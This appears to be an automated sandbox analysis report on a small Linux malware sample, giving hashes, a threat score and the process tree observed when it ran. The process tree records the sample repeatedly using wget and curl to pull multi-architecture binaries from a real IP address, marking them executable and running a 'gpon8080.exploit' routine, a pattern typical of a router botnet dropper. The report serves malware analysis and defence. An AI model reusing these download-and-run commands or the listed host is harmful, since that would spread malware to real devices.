Analysis

  • max time kernel
    92s
  • max time network
    93s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240729-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    28-07-2024 16:40

General

  • Target

    17f41b4b65e5ddad4a76594560d43927_JaffaCakes118

  • Size

    3KB

  • MD5

    17f41b4b65e5ddad4a76594560d43927

  • SHA1

    bb7691396c850ff2b4645b90336852650aa26eb6

  • SHA256

    36c3310e8853358d2d68f7b1f0ebd3b52f9691f58286799d1a7b9413903d5588

  • SHA512

    602d2b3fda5948c263ab2c48f96993daf5ef404faec82cb2e7f55eae7c8dbed3525b6715f537629d7299c3f4e43077bcf1429b81375e7b2e16f398768920b322

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 13 IoCs
  • Reads runtime system information 13 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
    /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
    1⤵
    • Writes file to tmp directory
    PID:699
    • /usr/bin/wget
      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86
      2⤵
        PID:700
      • /usr/bin/curl
        curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86
        2⤵
        • Reads runtime system information
        PID:705
      • /bin/cat
        cat m3th.x86
        2⤵
          PID:706
        • /bin/chmod
          chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0NWNM9
          2⤵
            PID:707
          • /tmp/g0away
            ./g0away gpon8080.exploit
            2⤵
            • Executes dropped EXE
            PID:708
          • /usr/bin/wget
            wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips
            2⤵
              PID:710
            • /usr/bin/curl
              curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips
              2⤵
              • Reads runtime system information
              PID:711
            • /bin/cat
              cat m3th.mips
              2⤵
                PID:712
              • /bin/chmod
                chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0NWNM9
                2⤵
                  PID:713
                • /tmp/g0away
                  ./g0away gpon8080.exploit
                  2⤵
                  • Executes dropped EXE
                  PID:714
                • /usr/bin/wget
                  wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl
                  2⤵
                    PID:716
                  • /usr/bin/curl
                    curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl
                    2⤵
                    • Reads runtime system information
                    PID:717
                  • /bin/cat
                    cat m3th.mpsl
                    2⤵
                      PID:718
                    • /bin/chmod
                      chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0NWNM9
                      2⤵
                        PID:719
                      • /tmp/g0away
                        ./g0away gpon8080.exploit
                        2⤵
                        • Executes dropped EXE
                        PID:720
                      • /usr/bin/wget
                        wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm
                        2⤵
                          PID:722
                        • /usr/bin/curl
                          curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm
                          2⤵
                          • Reads runtime system information
                          PID:723
                        • /bin/cat
                          cat m3th.arm
                          2⤵
                            PID:727
                          • /bin/chmod
                            chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                            2⤵
                              PID:728
                            • /tmp/g0away
                              ./g0away gpon8080.exploit
                              2⤵
                              • Executes dropped EXE
                              PID:729
                            • /usr/bin/wget
                              wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5
                              2⤵
                                PID:731
                              • /usr/bin/curl
                                curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5
                                2⤵
                                • Reads runtime system information
                                PID:732
                              • /bin/cat
                                cat m3th.arm5
                                2⤵
                                  PID:733
                                • /bin/chmod
                                  chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                  2⤵
                                    PID:734
                                  • /tmp/g0away
                                    ./g0away gpon8080.exploit
                                    2⤵
                                    • Executes dropped EXE
                                    PID:735
                                  • /usr/bin/wget
                                    wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6
                                    2⤵
                                      PID:737
                                    • /usr/bin/curl
                                      curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6
                                      2⤵
                                      • Reads runtime system information
                                      PID:738
                                    • /bin/cat
                                      cat m3th.arm6
                                      2⤵
                                        PID:739
                                      • /bin/chmod
                                        chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                        2⤵
                                          PID:740
                                        • /tmp/g0away
                                          ./g0away gpon8080.exploit
                                          2⤵
                                          • Executes dropped EXE
                                          PID:741
                                        • /usr/bin/wget
                                          wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7
                                          2⤵
                                            PID:743
                                          • /usr/bin/curl
                                            curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7
                                            2⤵
                                            • Reads runtime system information
                                            PID:744
                                          • /bin/cat
                                            cat m3th.arm7
                                            2⤵
                                              PID:745
                                            • /bin/chmod
                                              chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                              2⤵
                                                PID:746
                                              • /tmp/g0away
                                                ./g0away gpon8080.exploit
                                                2⤵
                                                • Executes dropped EXE
                                                PID:747
                                              • /usr/bin/wget
                                                wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc
                                                2⤵
                                                  PID:749
                                                • /usr/bin/curl
                                                  curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc
                                                  2⤵
                                                  • Reads runtime system information
                                                  PID:750
                                                • /bin/cat
                                                  cat m3th.ppc
                                                  2⤵
                                                    PID:751
                                                  • /bin/chmod
                                                    chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                                    2⤵
                                                      PID:752
                                                    • /tmp/g0away
                                                      ./g0away gpon8080.exploit
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:753
                                                    • /usr/bin/wget
                                                      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k
                                                      2⤵
                                                        PID:755
                                                      • /usr/bin/curl
                                                        curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k
                                                        2⤵
                                                        • Reads runtime system information
                                                        PID:756
                                                      • /bin/cat
                                                        cat m3th.m68k
                                                        2⤵
                                                          PID:757
                                                        • /bin/chmod
                                                          chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                                          2⤵
                                                            PID:758
                                                          • /tmp/g0away
                                                            ./g0away gpon8080.exploit
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:759
                                                          • /usr/bin/wget
                                                            wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc
                                                            2⤵
                                                              PID:761
                                                            • /usr/bin/curl
                                                              curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc
                                                              2⤵
                                                              • Reads runtime system information
                                                              PID:762
                                                            • /bin/cat
                                                              cat m3th.spc
                                                              2⤵
                                                                PID:763
                                                              • /bin/chmod
                                                                chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                                                2⤵
                                                                  PID:764
                                                                • /tmp/g0away
                                                                  ./g0away gpon8080.exploit
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:765
                                                                • /usr/bin/wget
                                                                  wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686
                                                                  2⤵
                                                                    PID:767
                                                                  • /usr/bin/curl
                                                                    curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686
                                                                    2⤵
                                                                    • Reads runtime system information
                                                                    PID:768
                                                                  • /bin/cat
                                                                    cat m3th.i686
                                                                    2⤵
                                                                      PID:769
                                                                    • /bin/chmod
                                                                      chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                                                      2⤵
                                                                        PID:770
                                                                      • /tmp/g0away
                                                                        ./g0away gpon8080.exploit
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:771
                                                                      • /usr/bin/wget
                                                                        wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4
                                                                        2⤵
                                                                          PID:773
                                                                        • /usr/bin/curl
                                                                          curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4
                                                                          2⤵
                                                                          • Reads runtime system information
                                                                          PID:774
                                                                        • /bin/cat
                                                                          cat m3th.sh4
                                                                          2⤵
                                                                            PID:775
                                                                          • /bin/chmod
                                                                            chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                                                            2⤵
                                                                              PID:776
                                                                            • /tmp/g0away
                                                                              ./g0away gpon8080.exploit
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              PID:777
                                                                            • /usr/bin/wget
                                                                              wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc
                                                                              2⤵
                                                                                PID:779
                                                                              • /usr/bin/curl
                                                                                curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc
                                                                                2⤵
                                                                                • Reads runtime system information
                                                                                PID:780
                                                                              • /bin/cat
                                                                                cat m3th.arc
                                                                                2⤵
                                                                                  PID:781
                                                                                • /bin/chmod
                                                                                  chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                                                                  2⤵
                                                                                    PID:782
                                                                                  • /tmp/g0away
                                                                                    ./g0away gpon8080.exploit
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:783

                                                                                Network

                                                                                MITRE ATT&CK Matrix

                                                                                Replay Monitor

                                                                                Loading Replay Monitor...

                                                                                Downloads